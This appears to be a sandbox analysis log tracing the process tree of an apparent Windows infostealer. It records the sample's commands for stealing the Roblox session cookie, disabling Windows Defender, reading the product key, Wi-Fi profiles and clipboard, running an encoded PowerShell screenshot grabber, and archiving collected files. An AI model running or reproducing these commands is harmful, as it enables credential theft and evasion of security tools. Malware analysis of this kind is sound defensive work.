C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI28522\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\NCYlz.zip" *"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\_MEI28522\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI28522\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\NCYlz.zip" *6⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption6⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7444 -s 3167⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault6⤵
-
C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe"C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe"C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe'"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend6⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 26⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"5⤵
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 26⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"5⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard6⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"5⤵
-
C:\Windows\system32\netsh.exenetsh wlan show profile6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\upxeld10\upxeld10.cmdline"7⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES148D.tmp" "c:\Users\Admin\AppData\Local\Temp\upxeld10\CSC837FB41BEC594818A3959722F399BB9.TMP"8⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"5⤵
-
C:\Windows\system32\getmac.exegetmac6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4832"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 48326⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1344"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 13446⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 732"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 7326⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4048"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 40486⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2448"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 24486⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5092"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 50926⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6092 -s 3527⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI36002\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\gncuo.zip" *"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Users\Admin\AppData\Local\Temp\_MEI36002\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI36002\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\gncuo.zip" *6⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
